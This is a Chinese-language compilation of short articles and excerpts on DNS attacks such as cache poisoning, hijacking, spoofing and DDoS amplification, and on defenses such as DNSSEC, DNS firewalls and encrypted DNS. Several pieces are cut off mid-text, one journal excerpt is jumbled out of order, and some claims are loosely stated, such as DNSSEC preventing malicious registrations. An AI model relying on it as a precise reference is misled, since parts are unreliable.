DNS服务器攻击与防范技术研究
dns攻击原理与防范
dns攻击原理与防范DNS攻击原理与防范一、引言在互联网的世界中,域名系统(Domain Name System,DNS)扮演着至关重要的角色,它为我们提供了便捷的域名访问服务。
然而,DNS 作为一项基础设施,也面临着各种潜在的威胁,其中最常见的就是DNS攻击。
本文将探讨DNS攻击的原理,并提供一些常用的防范措施。
二、DNS攻击原理1. DNS欺骗攻击DNS欺骗攻击,又称DNS缓存投毒攻击,是指攻击者通过篡改DNS 缓存中的解析记录,将合法域名解析到错误的IP地址上,从而使用户访问到恶意网站或受到其他攻击。
攻击者可以通过发送伪造的DNS响应包,或者通过中间人方式进行欺骗。
2. DNS劫持攻击DNS劫持攻击是指攻击者通过控制DNS服务器或本地主机等手段,将合法域名解析到攻击者指定的恶意IP地址上,从而获取用户的敏感信息、篡改网页内容等。
这种攻击方式常见于公共Wi-Fi等网络环境下。
3. DNS放大攻击DNS放大攻击是一种利用DNS协议的特性,通过发送少量的DNS查询请求,获取大量的DNS响应数据,从而造成目标服务器的带宽消耗过大,甚至导致拒绝服务(DDoS)攻击。
攻击者常常利用开放的DNS递归服务器来放大攻击流量。
三、DNS攻击防范措施1. 使用防火墙和入侵检测系统(IDS/IPS)等安全设备,对网络流量进行监测和过滤,防止恶意流量进入网络。
2. 定期更新操作系统和软件补丁,以修复已知的DNS漏洞和安全隐患,确保系统的安全性。
3. 配置防火墙规则,限制对DNS服务器的访问,只允许授权的IP 地址进行查询和更新操作,以减少被攻击的风险。
4. 使用安全的DNS解析服务商,如将域名解析交给可信赖的服务商,以提高域名解析的可靠性和安全性。
5. 实施DNSSEC(DNS安全扩展)技术,该技术通过数字签名和验证机制,确保域名解析结果的真实性和完整性,有效抵御欺骗和篡改攻击。
6. 部署反向代理服务器,将DNS服务器隐藏在内网,对外界提供的是反向代理服务器的IP地址,从而减少直接暴露在公网上的风险。
DNS安全问题及解决方案
DNS安全问题及解决方案随着互联网的普及和发展,我们越来越依赖于域名系统(Domain Name System,DNS)来查询和解析互联网上的域名。
然而,虽然DNS 是一个关键的基础设施,但它也面临着安全风险,这对我们的网络体验和数据安全构成潜在威胁。
本文将探讨DNS安全问题,并提出相应的解决方案。
一、DNS劫持DNS劫持是指黑客通过篡改DNS响应,将用户的域名解析请求导向恶意服务器,从而窃取用户的敏感信息或进行其他恶意活动。
DNS劫持的目标往往是银行、电子商务网站等需要用户输入用户名、密码或支付信息的网站。
为了解决DNS劫持的问题,一种解决方案是使用DNSSEC(域名系统安全扩展)。
DNSSEC通过数字签名的方式对DNS数据进行验证,确保DNS响应的完整性和真实性,从而有效防止DNS劫持。
另外,互联网服务提供商(ISP)也可采取安全措施,例如监测和阻止涉嫌进行DNS劫持的IP地址。
二、DNS缓存投毒DNS缓存投毒是指攻击者在公共DNS服务器中伪造缓存的解析结果,使用户访问合法网站时被引导到恶意网站。
这种攻击方法主要是通过修改公共DNS服务器的缓存数据来实现的。
要解决DNS缓存投毒问题,一方面可以使用DNS缓存污染检测与清理工具,及时发现并清除被污染的缓存。
另一方面,网络管理员可以采取安全配置措施,限制公共DNS服务器的访问权限,确保其不受攻击者的干扰。
三、DDoS攻击分布式拒绝服务(DDoS)攻击是指攻击者通过利用大量的恶意请求,使目标DNS服务器无法正常响应合法用户的请求,从而导致服务不可用。
为了应对DDoS攻击,可以采取多种解决方案。
首先,网络管理员可以配置防火墙和入侵检测系统,及时发现并屏蔽恶意请求。
其次,使用分布式防御系统,将流量分散到多个服务器上,提高容量和抗击DDoS攻击的能力。
此外,云服务提供商也可提供DDoS防御服务,通过多层次的过滤和流量清洗,确保DNS服务器的正常运行。
四、域名劫持域名劫持是指攻击者通过非法手段获取域名控制权,然后对域名进行篡改或指向恶意服务器,使合法用户无法正常访问网站。
域名系统中的DNS劫持如何防范与处理(五)
域名系统中的DNS劫持如何防范与处理导言:在现代互联网中,域名系统(DNS)起着至关重要的作用,它将我们输入的域名转换为对应的IP地址,使我们能够访问网站、发送电子邮件等。
然而,DNS劫持作为一种网络攻击手段,却常常给互联网用户带来一系列的安全和隐私隐患。
本文将探讨DNS劫持的原理、危害以及如何防范与处理这一问题。
第一部分:DNS劫持的原理DNS劫持指黑客通过非法手段来劫持域名解析系统,篡改DNS响应,将合法的域名解析请求重定向至恶意的网站或服务器,从而获取用户的个人信息、账号密码等敏感数据。
DNS劫持的实施可分为以下两种方式:1. 污染DNS缓存:黑客通过篡改合法DNS服务器的缓存记录,将合法域名指向恶意IP地址。
当用户访问该域名时,就会被重定向至黑客服务器,以实现劫持的目的。
2. 修改本地Hosts文件:黑客通过修改用户设备上的本地Hosts文件,将合法域名映射为恶意IP地址,使用户在访问该域名时被劫持。
第二部分:DNS劫持的危害DNS劫持对个人和组织都可能造成严重损失。
1. 用户隐私泄露:DNS劫持可能将用户的敏感信息发送给黑客,如账号密码、信用卡信息等,导致用户的财产损失和个人隐私泄露。
2. 虚假网站欺骗:黑客利用DNS劫持将用户访问合法网站的流量重定向至恶意网站,冒充合法网站以实施欺骗,如钓鱼攻击、虚假购物网站等。
3. 企业损失:对于企业来说,DNS劫持可能导致重要数据被窃取,商业机密被泄露,网络服务受到破坏等,进而造成财务和声誉上的损失。
第三部分:DNS劫持的防范与处理为了有效应对DNS劫持,用户和组织可以采取以下措施:1. 使用可靠的DNS服务提供商:选择公认可靠的、口碑好的DNS服务提供商。
这样可以减少恶意域名服务器的风险,并提高域名解析的安全性。
2. 更新系统和软件:定期更新操作系统、浏览器等软件,确保使用最新的版本。
这样可以及时修复已知漏洞,提高系统的安全性。
3. 配置防火墙和安全软件:合理配置防火墙和安全软件,及时检测和阻止恶意域名解析请求。
DNS安全防护解决方案
DNS安全防护解决方案一、背景介绍DNS(Domain Name System,域名系统)是互联网中用于将域名转换为IP地址的系统。
然而,DNS协议存在一些安全隐患,例如DNS劫持、DNS缓存投毒等攻击方式,这些攻击可能导致用户访问恶意网站、泄露敏感信息等问题。
为了保障网络安全,需要采取一系列的DNS安全防护措施。
二、DNS安全防护解决方案1. DNSSEC(DNS Security Extensions)DNSSEC是一种用于增强DNS安全性的扩展协议。
它通过数字签名的方式,确保DNS查询的真实性和完整性。
DNSSEC能够防止DNS劫持和DNS欺骗等攻击,并提供了域名验证机制,防止恶意域名的注册和使用。
2. DNS防火墙DNS防火墙是一种专门用于检测和拦截恶意DNS请求的设备。
它能够对DNS 流量进行实时监控,识别并拦截恶意域名、恶意IP地址等。
DNS防火墙可以根据预设的策略,对不符合规则的DNS请求进行拦截和过滤,提供了对DNS安全的主动防护。
3. DNS流量分析与监控DNS流量分析与监控是通过对DNS流量进行深度分析,检测和识别恶意行为的一种解决方案。
它可以对DNS查询的源地址、目的地址、查询类型等进行实时监控和记录,并通过算法和模型识别出异常行为。
通过及时发现和阻断恶意行为,保障DNS的安全性和可靠性。
4. 域名白名单和黑名单管理域名白名单和黑名单管理是一种通过对域名进行分类管理的方式,实现对恶意域名的拦截和防护。
白名单中包含了可信任的域名,黑名单中包含了已知的恶意域名。
DNS服务器可以根据白名单和黑名单对DNS查询进行过滤,拦截黑名单中的域名,提高DNS的安全性。
5. DNS流量清洗与反射攻击防护DNS流量清洗与反射攻击防护是一种针对大规模DDoS攻击的解决方案。
它通过对DNS流量进行清洗和过滤,剔除恶意请求和异常流量,保障DNS服务器的正常运行。
同时,它还能够识别和防御DNS反射攻击,提高DNS的可用性和稳定性。
如何防攻击DNS-DNS攻击的原理
如何防攻击DNS DNS攻击的原理DNS是用来干嘛呢?DNS其作用就是把域名和IP对应起来,建立一个映射数据库。
不过目前DNS已经受到各种黑客攻击,因此防攻击DNS就成为了困扰站长的一个难题,究竟如何能够有限的防攻击DNS,而防攻击DNS又应该从何做起,这都是站长们关心的话题,因此今天我们就一一的来解决防攻击DNS的相关问题。
如果我们要防攻击DNS就必须得知道DNS攻击的原理和攻击方式。
DNS攻击主要原理是根据每一个名称服务器中都有一个快取缓存区(Cache),这个快取缓存区的主要目的是将该名称服务器所查询出来的名称及相对的IP地址记录在快取缓存区中,这样当下一次还有另外一个客户端到次服务器上去查询相同的名称时,服务器就不用在到别台主机上去寻找,而直接可以从缓存区中找到该笔名称记录资料,传回给客户端,加速客户端对名称查询的速度。
利用相关漏洞进行攻击。
其攻击方式主要有:1) 域名劫持通过采用黑客手段控制了域名管理密码和域名管理邮箱,然后将该域名的NS纪录指向到黑客可以控制的DNS服务器,然后通过在该DNS服务器上添加相应域名纪录,从而使网民访问该域名时,进入了黑客所指向的内容。
2) 缓存投毒利用控制DNS缓存服务器,把原本准备访问某网站的用户在不知不觉中带到黑客指向的其他网站上。
其实现方式有多种,比如可以通过利用网民ISP端的DNS缓存服务器的漏洞进行攻击或控制,从而改变该ISP内的用户访问域名的响应结果;或者,黑客通过利用用户权威域名服务器上的漏洞,如当用户权威域名服务器同时可以被当作缓存服务器使用,黑客可以实现缓存投毒,将错误的域名纪录存入缓存中,从而使所有使用该缓存服务器的用户得到错误的DNS解析结果。
3)DDOS攻击一种攻击针对DNS服务器软件本身,通常利用BIND软件程序中的漏洞,导致DNS服务器崩溃或拒绝服务;另一种攻击的目标不是DNS服务器,而是利用DNS 服务器作为中间的“攻击放大器”,去攻击其它互联网上的主机,导致被攻击主机拒绝服务。
域名系统(DNS)的网络安全保护措施
域名系统(DNS)的网络安全保护措施域名系统(Domain Name System, DNS)是互联网中最重要的基础设施之一,它负责将域名转换为对应的IP地址,使得用户能够通过便于记忆的域名访问互联网资源。
然而,由于DNS的重要性和复杂性,它也成为了网络攻击的重要目标。
为了保障DNS的安全性,各界不断探索和实施各种网络安全保护措施。
本文将介绍域名系统的网络安全保护措施,以及如何有效应对DNS安全威胁。
一、DNS安全威胁概述DNS作为互联网的基础设施,面临着多种安全威胁,主要包括以下几个方面:1. DNS劫持:黑客通过篡改DNS响应数据,将用户重定向到恶意网站,窃取用户信息或进行钓鱼攻击。
2. DNS缓存投毒:攻击者向DNS服务器发送虚假的DNS响应,使得DNS服务器缓存错误的解析结果,导致用户无法正常访问目标网站。
3. DDoS攻击:通过向DNS服务器发送大量恶意请求,使得DNS服务器超负荷运行,导致服务不可用。
4. DNS重放攻击:攻击者通过重复发送相同的DNS请求,消耗DNS服务器资源,影响正常服务。
5. DNS欺骗:攻击者伪装成合法的DNS服务器,向用户提供虚假的解析结果,引导用户访问恶意网站。
以上安全威胁严重影响了互联网的正常运行和用户信息安全,因此需要采取有效的网络安全保护措施来应对这些威胁。
二、DNS网络安全保护措施1. DNSSEC(DNS Security Extensions)DNSSEC是一种基于公钥加密技术的DNS安全扩展,旨在提供数据的完整性和认证性。
通过数字签名和公钥加密技术,DNSSEC可以有效防止DNS劫持和DNS欺骗攻击。
部署DNSSEC可以保护DNS数据的完整性,确保用户访问的是合法的网站。
2. DNS防火墙DNS防火墙是一种专门用于保护DNS服务器的安全设备,可以检测和阻止恶意的DNS流量。
DNS防火墙可以过滤恶意的DNS请求,防止DNS缓存投毒和DDoS攻击,提高DNS服务器的安全性和稳定性。
DNS安全分析及防御技术研究
域 名解 析过 程如 下所 述 :
・ 稿 日期 :0 l0 —6 收 2 1 -31
内容是否合法 , 服务器端也无法验证 客户端请求是否 合法 。
基金项 目: 河南省教育厅 自然科学基金项 目( 0 1 12 05 2 1 139 0 ) 作者简介 : 邵明珠 (9 9 ) 女 , 新乡人 , , 17 - , 河南 讲师 硕士 , 主要从事网络安全 、 计算机应用技术研究。 3 9
第 1卷 第 5 9 期
21 o 0 1年 9月
河南机 电高等专科 学校 学报
Junl f nnMehncl n l tcl nier gC lg ora a ca ia adEe r a g ei ol e o He ci E n n e
V0. 9 № . 11 5
S p 2 1 e .0 1
D S安 全 分 析 及 防御 技 术研 究 N
邵 明珠 , 解瑞云 , 李伟峰
( 河南机 电高等专科学校 计算机科 学与技术 系, 河南 新 乡 430 ) 500
摘 要 : N 服 务是 It t DS n me 的基本支撑 , e 其安全性对 整个 Itme 起 着举足 轻重 的作 用。随着 网络 应用 的不 断深 ne t 化 ,N D S已成为 D o D S攻击的热点 目标 。针对 D S服务架构 的特 点, N 解析 了 D S面临的安全 问题 , N 并提 出 了相应向客户 端返 回域 名解 析结 ) N 同时更新 自己的缓存记录。 要对域名 . s CI进行解析 , t t OI e. T 并且 目标域名不在 果 , 客户端程序收到应答包后 , 会查询序列号和端 口 本地 D S N 服务器管辖 区域 , 本地 D S N 服务器 的缓存 号是否和 自己发出查询相匹配 , 若匹配则接受这个结 中也 没有 该域 名 的记 录 。 果; 不匹配则将应答包丢弃 。这就是整个 的 D S N 服务
HTTPS如何防范基于DNS的攻击
HTTPS如何防范基于DNS的攻击在当今数字化的时代,网络安全是至关重要的。
DNS(域名系统)作为将域名转换为 IP 地址的关键基础设施,经常成为攻击者的目标。
而 HTTPS(超文本传输安全协议)在防范基于 DNS 的攻击方面发挥着重要作用。
首先,我们来了解一下什么是基于 DNS 的攻击。
DNS 就像是互联网的电话簿,当我们在浏览器中输入一个网址(如)时,DNS 会将这个域名转换为对应的 IP 地址,以便我们能够连接到正确的服务器获取网页内容。
基于 DNS 的攻击就是攻击者利用 DNS 系统的漏洞或弱点来进行恶意活动。
常见的基于 DNS 的攻击方式包括 DNS 劫持和 DNS 欺骗。
DNS 劫持是指攻击者通过篡改 DNS 服务器的配置或控制 DNS 服务器,将用户对特定域名的请求重定向到恶意网站。
这意味着当您想要访问合法的网站时,可能会被带到一个充满恶意软件、欺诈内容或其他危险的页面。
DNS 欺骗则是攻击者伪造 DNS 响应,向用户提供虚假的 IP 地址,从而导致用户访问错误的网站。
那么,HTTPS 是如何来防范这些攻击的呢?HTTPS 协议通过加密客户端和服务器之间的通信来提供安全性。
当您使用 HTTPS 连接到一个网站时,浏览器会首先与服务器进行握手,协商加密算法和密钥。
这个过程确保了通信的机密性和完整性,即使攻击者能够截获通信数据,也无法解读其中的内容。
在防范 DNS 劫持方面,HTTPS 起到了重要的作用。
因为 HTTPS连接是基于域名进行的,而不是 IP 地址。
即使攻击者成功劫持了 DNS 响应,将用户重定向到了错误的 IP 地址,但由于服务器的证书是与域名绑定的,如果访问的服务器域名与证书不匹配,浏览器会发出警告并阻止连接。
这就有效地防止了用户被劫持到恶意网站。
此外,HTTPS 还可以防范 DNS 欺骗。
由于通信是加密的,攻击者无法伪造有效的 HTTPS 响应。
即使他们能够发送虚假的 DNS 响应,也无法提供与合法网站匹配的加密证书,浏览器会检测到这种不一致并发出警报。
域名系统DNS攻击及防御技术综述
域名系统DNS攻击及防御技术综述随着信息技术的迅速发展,网络已经成为了大众获取信息、交流交流、购物和娱乐的主要工具。
然而,网络的安全性问题也时至今日依然存在。
DNS攻击是网络安全领域中的一个重大问题。
本文将对DNS攻击进行阐述,同时探讨防御DNS攻击的技术手段。
一、DNS攻击的类型DNS攻击分为以下几类:1. DNS欺骗攻击。
DNS服务器被黑客攻击,DNS服务器将正确的IP地址对应的域名解析结果篡改成错误的IP地址对应的域名解析结果,从而导致用户访问到恶意网站。
2. DNS投毒攻击。
黑客对一些没有被授权的DNS缓存服务器进行攻击,篡改DNS缓存服务器上存储的域名解析结果,这样就使得用户访问到的是错误的网站,从而达到了攻击的目的。
3. DNS泛洪攻击。
DNS泛洪攻击是一种分布式拒绝服务攻击,黑客利用大量的伪造请求占用正常的DNS服务器的资源,从而让正常的用户无法获取到域名解析结果。
二、DNS攻击的影响DNS攻击主要的影响有以下几点:1. 篡改服务器的域名解析结果,导致用户访问到错误的网站,从而造成用户的损失和隐私泄露的风险。
2. 导致现在的站点无法正常访问,影响业务的正常运营,造成公司运营损失。
3. 导致服务器宕机,造成大量数据丢失和业务中断,从而造成严重的经济损失。
三、防御DNS攻击的技术手段为了保护企业和用户的数据安全,同时避免DNS攻击的影响,以下是防御DNS攻击的技术手段:1. DNSSECDNSSEC可以为解决DNS中的“中间人攻击”产生的问题提供解决方案。
DNSSEC采用了对称加密和非对称加密相结合的方式,保护DNS协议的安全性。
DNSSEC同样可以保护DNS区域的完整性。
2. 验证域名的正确性在浏览器中输入URL时,浏览器会通过DNS获取域名对应的IP地址。
使用HTTPS协议可进行加密,从而保证域名与IP地址匹配。
3. 限制应答长度DNS应答数据包的长度会占用可用的网络带宽,黑客利用很多的伪造的DNS 应答数据包给DNS服务器带来巨大的压力。
dns攻击防范方法
dns攻击防范方法DNS(Domain Name System)攻击是一种网络安全威胁,它可以导致网络服务中断、数据泄露和其他安全问题。
为了防范DNS攻击,可以采取以下多种方法:1. 使用防火墙和入侵检测系统,网络管理员可以配置防火墙来过滤可能的DNS攻击流量,并使用入侵检测系统来监视网络流量,及时发现异常行为。
2. 加强访问控制,限制只有授权用户可以访问DNS服务器,使用强密码和多因素认证来保护DNS服务器的访问权限。
3. 及时更新和维护DNS软件,保持DNS服务器软件的更新,及时安装厂商发布的安全补丁,以修复已知的漏洞。
4. DNS防护设备,部署专门的DNS防护设备,如DNS防火墙、DNS代理服务器等,用于监控和过滤DNS流量,识别和阻止潜在的攻击。
5. DNSSEC(DNS Security Extensions),DNSSEC是一种用于增强DNS安全性的扩展,它通过数字签名来验证DNS数据的完整性,防止DNS数据被篡改。
6. 监控DNS流量,定期监控DNS流量,及时发现异常流量和行为,识别潜在的攻击和威胁。
7. 加强域名注册商安全,保护域名注册商的账户安全,使用强密码和多因素认证,防止域名被劫持和操纵。
8. 域名转移锁定,对重要的域名进行转移锁定,防止未经授权的域名转移和修改。
综上所述,防范DNS攻击需要综合使用技术手段和管理措施,包括加强设备和网络安全防护、加强访问控制、及时更新软件补丁、部署专门的DNS安全设备等。
同时,定期进行安全审计和漏洞扫描,加强对域名注册商的管理和监控,也是防范DNS攻击的重要手段。
希望以上信息能够帮助你更好地了解和防范DNS攻击。
DNS缓存中毒攻击与防范
2009.1211DNS缓存中毒攻击与防范绿盟科技开发中心 郭大兴 周向荣 摘要:DNS简及DNS缓存中毒攻击分析与防范。
关键词:DNS 缓存中毒;攻击;防护 0 前言为了在网络上标识一个实体,TCP/IP协议使用了IP地址,由于IP地址难于记忆,需要一种容易记忆的方法,于是就产生了一种名字到地址或地址到名字的映射机制。
在Internet初期,这种映射可以使用一个主机文件来保存,文件只需要包括名字和地址这两列,当程序或用户想把名字映射为地址时,去查找这个主机文件可以了。
但是网络迅速的发展,已经不可能再继续使用主机文件来保存这种映射关系,因为主机文件会太大而无法存储所有信息,而且,每当出现变化时,也必须对全世界的所有主机文件都进行更新,使用一个文件的方式维护IP地址与名称之间的转换将不再适合,于是DNS就这样诞生了。
DNS是用于管理主机名称和地址信息映射的分布式数据库系统,将这个巨大的映射信息划分成许多较小的部分,并把每一部分存储在不同的计算机上,需要映射的计算机可以查询一个最近的持有所需要信息的计算机。
DNS目前已经成为大部分网络应用的基础了。
一旦遭受攻击,用户将不能进行正常的网络访问,因此DNS的安全影响巨大。
在DNS攻击中危害比较大的当属DNS缓存中毒。
接下来我们将详细介绍缓存中毒的攻击原理和过程,以及如何防护。
1 DNS缓存中毒攻击原理在介绍攻击原理和过程之前首先来介绍一下DNS工作的过程。
DNS被设计成客户-服务器应用程序,需要把地址映射为名字或把名字映射为地址的主机需要调用DNS解析程序,向最近的DNS服务器发出查询请求,此时,DNS服务器可以有两种方式来响应客户的请求,一种叫递归解析,另一种叫迭代解析。
DNS缓存中毒攻击主要是针对递归解析方式工作并缓存非本域的解析结果的DNS服务器。
下面就主要介绍下递归解析过程。
DNS递归解析过程如图1所示。
图1 DNS递归解析示意图(1)应用程序需要解析一个域名时,会向本机上的DNS客户端--解析程序发起域名解析的请求,解析程序收到应用程序的请求后会代表应用程序向首选DNS服务器DNS1发起域名解析请求;(2)DNS1收到解析请求后会去查询自己的管辖域,如果请求的是自己管辖域的域名就会直接将查询结果返回给解析程序,进而传递给应用程序,如果不在DNS1的管辖域内,DNS1就向它的上级服务器DNS2发起解析请求,等待DNS2的查询结果;(3)如果DNS2解析不了,就会告诉DNS1,我解析不了,但是我知道DNS3可能会知道,你去问问DNS3看看;(4)DNS1就会给DNS3发出解析请求,等到DNS3的查询结果;(5)如果DNS3可以解析,那么就告诉DNS1解析结果,如果DNS3也解析不了,那么DNS3也会像DNS2那样,告诉DNS它所知道的某个DNS可能会知道;(6)最后,DNS1又向DNS4发出查询请求,等待查询结果;(7)DNS4可以解析该域名,就发送一个相应包给DNS1解析结果;(8)DNS1收到解析结果后就会将结果发送给客户端的解析程序,并将解析结果保存在自己的缓存中,以便以后再有2009.1212请求解析该域名时,就可以直接从缓存中得到解析的结果,提高效率。
DNS安全防护解决方案
DNS安全防护解决方案引言概述:DNS(域名系统)是互联网中负责将域名转换为IP地址的系统,它是互联网的基础设施之一。
然而,DNS也面临着各种安全威胁,如DNS劫持、DNS欺骗等。
为了保护DNS的安全性,各种解决方案被提出并广泛应用。
本文将介绍五种常见的DNS安全防护解决方案。
一、加密通信1.1 DNS over HTTPS(DoH)- DoH将DNS查询数据包通过HTTPS协议进行加密传输,防止中间人攻击。
- DoH还可以绕过网络运营商对DNS查询的监控和劫持。
1.2 DNS over TLS(DoT)- DoT通过将DNS查询数据包通过TLS协议进行加密传输,保护了DNS查询的隐私和完整性。
- DoT可以防止中间人攻击和DNS欺骗。
1.3 DNSCurve- DNSCurve是一种基于非对称加密算法的DNS安全传输协议,可以保护DNS查询的隐私和完整性。
- DNSCurve还可以防止DNS缓存投毒和DNS劫持攻击。
二、域名白名单和黑名单过滤2.1 域名白名单过滤- 域名白名单过滤是通过定义一组允许访问的域名列表来过滤DNS查询。
- 只有在白名单中的域名才能被解析,可以有效防止恶意域名的访问。
2.2 域名黑名单过滤- 域名黑名单过滤是通过定义一组禁止访问的域名列表来过滤DNS查询。
- 在黑名单中的域名将被拒绝解析,可以防止访问恶意网站和不良内容。
2.3 DNS防火墙- DNS防火墙可以根据域名白名单和黑名单过滤DNS查询。
- 它还可以检测和阻止恶意域名、恶意软件和僵尸网络的访问。
三、DNSSEC3.1 DNSSEC原理- DNSSEC通过数字签名技术来验证DNS查询的真实性和完整性。
- 它可以防止DNS缓存投毒和DNS欺骗攻击。
3.2 DNSSEC部署- DNSSEC需要在域名服务器和DNS解析器上进行配置和支持。
- 域名服务器需要签署区域文件,并将数字签名存储在DNSKEY记录中。
3.3 DNSSEC验证- DNS解析器可以通过验证数字签名来验证DNS查询的真实性和完整性。
DNS 技术中的安全加密研究
DNS 技术中的安全加密研究DNS(Domain Name System,域名系统)是互联网中最基础的服务之一,它将人类可读的域名转化为计算机可读的 IP 地址,使得用户可以通过域名轻松地访问网络上的各种资源。
然而,DNS 协议的本质和安全弱点也是众所周知的。
攻击者可以通过 DNS 劫持、欺骗、重放攻击等手段,轻而易举地窃取用户的敏感信息、篡改用户的访问流量及向用户注入恶意的软件等。
因此,如何保证 DNS 协议的安全就成为了一个重要的研究方向。
DNS 安全加密技术是一种基于公开密钥加密的技术,它的基本思想是使用公钥对数据进行加密,防止攻击者窃听、篡改 DNS 数据包的内容。
对于 DNS 服务器来说,它需要通过私钥解密客户端传输过来的数据,才能正确地向客户端发送响应。
DNS 安全加密技术的优点是可以有效地提高数据的安全性和机密性,保护用户的隐私和数据不被窃听、篡改和重放攻击。
最近,DNS 安全加密技术的研究越来越受到关注,DNSSEC(DNS Security Extensions,DNS 安全扩展)技术也逐渐被广泛应用和推广。
DNSSEC 技术采用了公钥加密和数字签名技术,可以保证 DNS 查询的真实性、完整性和可靠性,有效地抵御了 DNS 投毒、欺骗、篡改等攻击。
DNSSEC 技术的基础是通过数字证书对DNS 解析结果进行数字签名,这样用户就可以确认 DNS 解析结果的真实性和完整性。
另外,还有一种 DNS 安全加密技术叫做DNS-over-TLS(Transport Layer Security,运输层安全性),它的思想是通过 TLS 协议对 DNS 数据进行加密,防止 DNS 数据包在传输过程中被窃听和篡改。
DNS-over-TLS 技术主要针对于DNSUDP 协议中的弱点,可以有效地防止 DNS DOS 攻击和 DNS 劫持攻击等,提高用户的 DNS 查询速度和安全性。
DNS 技术中的安全加密研究还存在着一些问题和挑战,比如:DNSSEC 技术的实现复杂、引入新的安全漏洞;DNS-over-TLS 技术的运行效率低、延迟时间长等。
DNS安全性分析与对策研究
DNS安全性分析与对策研究1. 引言DNS(Domain Name System)是互联网中用于将域名解析为 IP 地址的一种系统。
它是互联网基础设施的重要组成部分,负责将用户提供的域名映射到对应的 IP 地址。
然而,由于其开放性和分布式特性,DNS也面临着一些安全威胁。
本文将分析DNS的安全性问题,并提出相关的对策。
2. DNS安全性问题2.1 DNS欺骗攻击DNS欺骗攻击是恶意攻击者利用缺乏保护措施的DNS服务器,向用户返回虚假的IP地址,使用户访问被攻击者控制的恶意网站。
这种攻击可能导致用户的个人信息泄露、恶意软件传播等安全问题。
2.2 DNS缓存投毒攻击DNS缓存投毒攻击是攻击者伪造合法的DNS响应,并将其注入到DNS缓存中,从而篡改合法的DNS记录。
当用户再次访问该域名时,DNS缓存将返回恶意的IP地址,导致用户访问恶意网站或者进行其他恶意行为。
2.3 DNS拒绝服务(DoS)攻击DNS拒绝服务攻击是通过向目标DNS服务器发送大量无效或伪造的请求,以消耗服务器的计算资源和网络带宽,使正常用户无法访问正常的DNS服务。
这种攻击可以导致服务不可用,造成经济损失和用户体验下降。
3. DNS安全对策3.1 DNSSECDNSSEC(Domain Name System Security Extensions)是一种通过数字签名保护DNS数据完整性和认证的解决方案。
它使用公钥加密技术来验证DNS响应的真实性,并确保不会受到欺骗攻击。
部署DNSSEC可以有效防止DNS欺骗攻击和DNS缓存投毒攻击。
3.2 DNS流量监测和分析在DNS服务器和运营商部署流量监测和分析系统可以帮助及时发现和应对DNS拒绝服务攻击。
通过监测DNS流量的特征和行为,及时识别异常流量并采取相应的防御措施,可以减轻攻击对网络的影响。
3.3 增加网络带宽和服务器资源提升网络带宽和增加DNS服务器资源可以增强系统的承载能力,更好地抵御DNS拒绝服务攻击。
HTTPS如何防范基于DNS的中间人攻击
HTTPS如何防范基于DNS的中间人攻击在当今数字化的时代,网络安全成为了至关重要的问题。
其中,基于 DNS 的中间人攻击是一种常见且具有威胁性的攻击方式。
然而,HTTPS 协议为我们提供了一道有力的防线,来抵御这种潜在的威胁。
首先,让我们了解一下什么是基于 DNS 的中间人攻击。
DNS,即域名系统,它就像是互联网的电话簿,将我们输入的域名(比如)转换为对应的 IP 地址,以便我们能够访问到正确的网站。
而基于 DNS 的中间人攻击,攻击者会篡改 DNS 解析的结果,将用户引导到一个虚假的网站。
比如说,你原本想访问银行的官方网站进行重要的金融操作,但由于 DNS 被篡改,你被导向了一个与官方网站外观相似的钓鱼网站。
在这个虚假的网站上,你输入的用户名、密码和其他敏感信息就会被攻击者窃取,从而造成严重的损失。
那么,HTTPS 是如何来防范这种攻击的呢?HTTPS 中的加密机制是关键。
当我们使用 HTTPS 访问网站时,客户端(也就是我们的浏览器)和服务器之间会建立一个安全的加密连接。
这个加密过程使用了对称加密和非对称加密相结合的方式。
在建立连接之初,服务器会向客户端发送一个数字证书。
这个证书就像是服务器的“身份证”,包含了服务器的名称、公钥等重要信息。
客户端会对这个证书进行验证,以确保它是由受信任的证书颁发机构颁发的,并且没有被篡改。
如果证书验证通过,客户端会生成一个对称加密的密钥,并使用服务器的公钥对其进行加密,然后发送给服务器。
由于只有服务器拥有对应的私钥能够解密,所以这个对称密钥可以在双方之间安全地传递。
接下来,双方就使用这个对称密钥对后续的通信数据进行加密和解密。
由于通信数据是加密的,即使攻击者能够篡改 DNS 解析结果,将用户引导到虚假的网站,他们也无法解密和读取在客户端和真正服务器之间传输的加密数据。
此外,HTTPS 还通过完整性验证来增强安全性。
在数据传输过程中,会生成一个消息验证码(MAC),用于验证数据在传输过程中是否被篡改。
浅析DNS的攻击与防范
础服务 , 它实现了将 网络域名 映射为网络 I P地址 , 因此其安全性对 将会直接影响到连接这些服务器的所有用户 。 整个 I n t e r n e t 的安全性起着十分重要的作用。D N S 作为 当今全球最 3 . 2 D N S 欺骗 D N S欺 骗 是局 域 网常见 的一 种 D N S 攻 击 方式 ,是 冒充 域 名 服 大、 最复杂的分布式层次数据库 系统 , 由于其开放 、 庞大 、 复杂 的特 N S服务器响应之前先 性 以及设计之初对于安全性 的考虑不足 ,再加上人为 的攻击和破 务器进行 的一种欺骗行为 。网络攻击者在 D 坏, D N S已面 临非 常 严重 的安 全 威 胁 。 将虚假 的响应结果交给用户 , 从而通过欺骗的手段使用户去访问恶 2 D N S的工作 原 理 意的网站 。假设当用户提交给 D N S服务器的域名解析请求报文数 D N S 是为 了实现域名和 I P地址之 间的转换 ,它的工作原理就 据 包 被截 获 ,然后 按 网络攻 击 者 的 意 图将 一 个虚 假 的 I P地 址 作 为 是在域名与 I P地址两者之 间进行 相互 的映射 ,起到相当于 翻译 的 应答 信息返 回给用户 ,用户就会把这个虚假的 I P 地址作为他所要 作用 。 D N S 可分为 S e r v e r 和C l i e n t 两部分 , 当C l i e n t 向S e v r e r 发 出域 的 I P地址而进行访 问,这样他就会被不知不觉地被欺骗到了网络 名的解析请 求时 , 本地 的 S e ve r r 先查询 自己的数据库是否存在需要 攻击 者 想 要其 访 问 的那 个 网站 , 从 而实 现 了 D N S 欺骗。 的内容 , 如果有则发送应答数据包并给出相应的结果 , 否则它将 向 3 . 3 D D o S攻击 D D o S攻击 主 要有 两 种 实现 方 式 : 上一层 S e ve r r 进行查询 。如此不断查询 , 直至找到相应的结果或将 查询失败的信息反馈给 C l i e n t 。D N S具体 的工作流程如下 : 3 . 3 . 1针对 D N S的服务器软件 , 利用其 软件程序 中存在的各种 ( 1 ) C l i e n t 首先 向本地 的 S e r v e r 发出查询请求 , 如要查询解析域 漏洞 , 导致 D N S服务器崩溃或拒绝提供服务 ;
DNS安全防护解决方案
